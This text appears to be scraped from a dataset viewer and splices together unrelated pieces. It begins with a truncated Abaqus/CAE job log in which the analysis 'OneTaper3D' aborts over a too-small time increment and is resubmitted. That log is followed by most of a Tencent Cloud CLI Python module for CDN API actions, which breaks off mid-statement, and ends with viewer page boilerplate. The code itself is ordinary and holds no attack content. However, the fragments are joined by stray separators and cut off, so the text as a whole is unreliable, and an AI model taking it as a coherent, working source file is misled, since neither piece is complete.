'timeIncrement': 1e-06, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 9,
'phase': STANDARD_PHASE, 'equilibrium': 9})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 2U',
'timeIncrement': 5e-07, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 9,
'phase': STANDARD_PHASE, 'equilibrium': 9})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 3U',
'timeIncrement': 1.25e-07, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 7,
'phase': STANDARD_PHASE, 'equilibrium': 7})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': STANDARD_PHASE,
'message': 'There is zero FORCE everywhere in the model based on the default criterion. please check the value of the average FORCE during the current iteration to verify that the FORCE is small enough to be treated as zero. if not, please use the solution controls to reset the criterion for zero FORCE.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {'phase': STANDARD_PHASE,
'message': 'Time increment required is less than the minimum specified',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 4U',
'timeIncrement': 1e-07, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 9,
'phase': STANDARD_PHASE, 'equilibrium': 9})
mdb.jobs['OneTaper3D']._Message(ABORTED, {'phase': STANDARD_PHASE,
'message': 'Analysis phase failed due to errors', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ERROR, {
'message': 'Abaqus/Standard Analysis exited with an error - Please see the message file for possible error messages if the file exists.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(JOB_ABORTED, {
'message': 'Abaqus/Standard Analysis exited with an error - Please see the message file for possible error messages if the file exists.',
'jobName': 'OneTaper3D'})
mdb.models['Model-1'].steps['Step-1'].setValues(minInc=1e-09)
mdb.jobs['OneTaper3D'].submit(consistencyChecking=OFF)
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': BATCHPRE_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 4 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': 'DEGREE OF FREEDOM 5 IS NOT ACTIVE IN THIS MODEL AND CAN NOT BE RESTRAINED',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': BATCHPRE_PHASE,
'message': '36 elements are distorted. Either the isoparametric angles are out of the suggested limits or the triangular or tetrahedral quality measure is bad. The elements have been identified in element set WarnElemDistorted.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FILE, {'phase': BATCHPRE_PHASE,
'file': '/home2/banerjee/Abaqus/AdvComp/OneTaper3DCZM/OneTaper3D.odb',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(COMPLETED, {'phase': BATCHPRE_PHASE,
'message': 'Analysis phase complete', 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STARTED, {'phase': STANDARD_PHASE,
'clientHost': 'kirchhoff', 'handle': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STEP, {'phase': STANDARD_PHASE, 'stepId': 1,
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': STANDARD_PHASE,
'message': 'The 3-direction at one or more points in one or more layers in 228 elements as defined in *ORIENTATION are in the opposite direction to the element normals. Either the 1 or 2 and the 3-direction defined in *ORIENTATION will be reversed. The elements have been identified in element set WarnElem3DirOppElemNormalStep1Inc1.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FRAME, {'phase': STANDARD_PHASE, 'step': 0,
'frame': 0, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': 0,
'timeIncrement': 1e-06, 'increment': 0, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 0,
'phase': STANDARD_PHASE, 'equilibrium': 0})
mdb.jobs['OneTaper3D']._Message(MEMORY_ESTIMATE, {'phase': STANDARD_PHASE,
'jobName': 'OneTaper3D', 'memory': 423.494834899902})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 1U',
'timeIncrement': 1e-06, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 9,
'phase': STANDARD_PHASE, 'equilibrium': 9})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 2U',
'timeIncrement': 2.5e-07, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 5,
'phase': STANDARD_PHASE, 'equilibrium': 5})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': STANDARD_PHASE,
'message': 'There is zero FORCE everywhere in the model based on the default criterion. please check the value of the average FORCE during the current iteration to verify that the FORCE is small enough to be treated as zero. if not, please use the solution controls to reset the criterion for zero FORCE.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 0.0, 'attempts': ' 3U',
'timeIncrement': 6.25e-08, 'increment': 1, 'stepTime': 0.0, 'step': 1,
'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 9,
'phase': STANDARD_PHASE, 'equilibrium': 9})
mdb.jobs['OneTaper3D']._Message(WARNING, {'phase': STANDARD_PHASE,
'message': 'There is zero FORCE everywhere in the model based on the default criterion. please check the value of the average FORCE during the current iteration to verify that the FORCE is small enough to be treated as zero. if not, please use the solution controls to reset the criterion for zero FORCE.',
'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(ODB_FRAME, {'phase': STANDARD_PHASE, 'step': 0,
'frame': 1, 'jobName': 'OneTaper3D'})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 3.125e-08, 'attempts': 4,
'timeIncrement': 3.125e-08, 'increment': 1, 'stepTime': 3.125e-08,
'step': 1, 'jobName': 'OneTaper3D', 'severe': 0, 'iterations': 4,
'phase': STANDARD_PHASE, 'equilibrium': 4})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': 3.125e-08,
'attempts': ' 1U', 'timeIncrement': 3.125e-08, 'increment': 2,
'stepTime': 3.125e-08, 'step': 1, 'jobName': 'OneTaper3D', 'severe': 0,
'iterations': 6, 'phase': STANDARD_PHASE, 'equilibrium': 6})
mdb.jobs['OneTaper3D']._Message(STATUS, {'totalTime': | |
# -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli.nice_command import NiceCommand
import tccli.error_msg as ErrorMsg
import tccli.help_template as HelpTemplate
from tccli import __version__
from tccli.utils import Utils
from tccli.configure import Configure
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.cdn.v20180606 import cdn_client as cdn_client_v20180606
from tencentcloud.cdn.v20180606 import models as models_v20180606
from tccli.services.cdn import v20180606
from tccli.services.cdn.v20180606 import help as v20180606_help
def doListTopData(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ListTopData", g_param[OptionsDefine.Version])
return
param = {
"StartTime": Utils.try_to_json(argv, "--StartTime"),
"EndTime": Utils.try_to_json(argv, "--EndTime"),
"Metric": Utils.try_to_json(argv, "--Metric"),
"Filter": Utils.try_to_json(argv, "--Filter"),
"Domains": Utils.try_to_json(argv, "--Domains"),
"Project": Utils.try_to_json(argv, "--Project"),
"Detail": Utils.try_to_json(argv, "--Detail"),
"Code": Utils.try_to_json(argv, "--Code"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ListTopDataRequest()
model.from_json_string(json.dumps(param))
rsp = client.ListTopData(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeOriginData(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeOriginData", g_param[OptionsDefine.Version])
return
param = {
"StartTime": Utils.try_to_json(argv, "--StartTime"),
"EndTime": Utils.try_to_json(argv, "--EndTime"),
"Metric": Utils.try_to_json(argv, "--Metric"),
"Domains": Utils.try_to_json(argv, "--Domains"),
"Project": Utils.try_to_json(argv, "--Project"),
"Interval": Utils.try_to_json(argv, "--Interval"),
"Detail": Utils.try_to_json(argv, "--Detail"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeOriginDataRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeOriginData(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeMapInfo(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeMapInfo", g_param[OptionsDefine.Version])
return
param = {
"Name": Utils.try_to_json(argv, "--Name"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeMapInfoRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeMapInfo(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGetDisableRecords(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("GetDisableRecords", g_param[OptionsDefine.Version])
return
param = {
"StartTime": Utils.try_to_json(argv, "--StartTime"),
"EndTime": Utils.try_to_json(argv, "--EndTime"),
"Url": Utils.try_to_json(argv, "--Url"),
"Status": Utils.try_to_json(argv, "--Status"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.GetDisableRecordsRequest()
model.from_json_string(json.dumps(param))
rsp = client.GetDisableRecords(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribePayType(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribePayType", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribePayTypeRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribePayType(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeIpVisit(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeIpVisit", g_param[OptionsDefine.Version])
return
param = {
"StartTime": Utils.try_to_json(argv, "--StartTime"),
"EndTime": Utils.try_to_json(argv, "--EndTime"),
"Domains": Utils.try_to_json(argv, "--Domains"),
"Project": Utils.try_to_json(argv, "--Project"),
"Interval": Utils.try_to_json(argv, "--Interval"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeIpVisitRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeIpVisit(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCdnData(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeCdnData", g_param[OptionsDefine.Version])
return
param = {
"StartTime": Utils.try_to_json(argv, "--StartTime"),
"EndTime": Utils.try_to_json(argv, "--EndTime"),
"Metric": Utils.try_to_json(argv, "--Metric"),
"Domains": Utils.try_to_json(argv, "--Domains"),
"Project": Utils.try_to_json(argv, "--Project"),
"Interval": Utils.try_to_json(argv, "--Interval"),
"Detail": Utils.try_to_json(argv, "--Detail"),
"Isp": Utils.try_to_json(argv, "--Isp"),
"District": Utils.try_to_json(argv, "--District"),
"Protocol": Utils.try_to_json(argv, "--Protocol"),
"DataSource": Utils.try_to_json(argv, "--DataSource"),
"IpProtocol": Utils.try_to_json(argv, "--IpProtocol"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCdnDataRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeCdnData(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisableCaches(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DisableCaches", g_param[OptionsDefine.Version])
return
param = {
"Urls": Utils.try_to_json(argv, "--Urls"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DisableCachesRequest()
model.from_json_string(json.dumps(param))
rsp = client.DisableCaches(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableCaches(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("EnableCaches", g_param[OptionsDefine.Version])
return
param = {
"Urls": Utils.try_to_json(argv, "--Urls"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.EnableCachesRequest()
model.from_json_string(json.dumps(param))
rsp = client.EnableCaches(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20180606": cdn_client_v20180606,
}
MODELS_MAP = {
"v20180606": models_v20180606,
}
ACTION_MAP = {
"ListTopData": doListTopData,
"DescribeOriginData": doDescribeOriginData,
"DescribeMapInfo": doDescribeMapInfo,
"GetDisableRecords": doGetDisableRecords,
"DescribePayType": doDescribePayType,
"DescribeIpVisit": doDescribeIpVisit,
"DescribeCdnData": doDescribeCdnData,
"DisableCaches": doDisableCaches,
"EnableCaches": doEnableCaches,
}
AVAILABLE_VERSION_LIST = [
v20180606.version,
]
AVAILABLE_VERSIONS = {
'v' + v20180606.version.replace('-', ''): {"help": v20180606_help.INFO,"desc": v20180606_help.DESC},
}
def cdn_action(argv, arglist):
if "help" in argv:
versions = sorted(AVAILABLE_VERSIONS.keys())
opt_v = "--" + OptionsDefine.Version
version = versions[-1]
if opt_v in argv:
version = 'v' + argv[opt_v].replace('-', '')
if version not in versions:
print("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return
action_str = ""
docs = AVAILABLE_VERSIONS[version]["help"]
desc = AVAILABLE_VERSIONS[version]["desc"]
for action, info in docs.items():
action_str += " %s\n" % action
action_str += Utils.split_str(" ", info["desc"], 120)
helpstr = HelpTemplate.SERVICE % {"name": "cdn", "desc": desc, "actions": action_str}
print(helpstr)
else:
print(ErrorMsg.FEW_ARG)
def version_merge():
help_merge = {}
for v in AVAILABLE_VERSIONS:
for action in AVAILABLE_VERSIONS[v]["help"]:
if action not in help_merge:
help_merge[action] = {}
help_merge[action]["cb"] = ACTION_MAP[action]
help_merge[action]["params"] = []
for param in AVAILABLE_VERSIONS[v]["help"][action]["params"]:
if param["name"] not in help_merge[action]["params"]:
help_merge[action]["params"].append(param["name"])
return help_merge
def register_arg(command):
cmd = NiceCommand("cdn", cdn_action)
command.reg_cmd(cmd)
cmd.reg_opt("help", "bool")
cmd.reg_opt(OptionsDefine.Version, "string")
help_merge = version_merge()
for actionName, action in help_merge.items():
c = NiceCommand(actionName, action["cb"])
cmd.reg_cmd(c)
c.reg_opt("help", "bool")
for param in action["params"]:
c.reg_opt("--" + param, "string")
for opt in OptionsDefine.ACTION_GLOBAL_OPT:
stropt = "--" + opt
c.reg_opt(stropt, "string")
def parse_global_arg(argv):
params = {}
for opt in OptionsDefine.ACTION_GLOBAL_OPT:
stropt = "--" + opt
if stropt in argv:
params[opt] = argv[stropt]
else:
params[opt] = None
if params[OptionsDefine.Version]:
params[OptionsDefine.Version] = "v" + params[OptionsDefine.Version].replace('-', '')
config_handle = Configure()
profile = config_handle.profile
if ("--" + OptionsDefine.Profile) in argv:
profile = argv[("--" + OptionsDefine.Profile)]
is_conexist, conf_path = config_handle._profile_existed(profile + "." + config_handle.configure)
is_creexist, cred_path = config_handle._profile_existed(profile + "." + config_handle.credential)
config = {}
cred = {}
if is_conexist:
config = config_handle._load_json_msg(conf_path)
if is_creexist:
cred = config_handle._load_json_msg(cred_path)
for param in params.keys():
if param == OptionsDefine.Version:
continue
if params[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId]:
if param in cred:
params[param] = cred[param]
else:
raise Exception("%s is invalid" % param)
else:
if param in config:
params[param] = config[param]
elif param == OptionsDefine.Region:
raise Exception("%s is invalid" % OptionsDefine.Region)
try:
if params[OptionsDefine.Version] is None:
version = config["cdn"][OptionsDefine.Version]
params[OptionsDefine.Version] = "v" + version.replace('-', '')
if params[OptionsDefine.Endpoint] is None:
params[OptionsDefine.Endpoint] = config["cdn"][OptionsDefine.Endpoint]
except Exception as err:
raise Exception("config |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.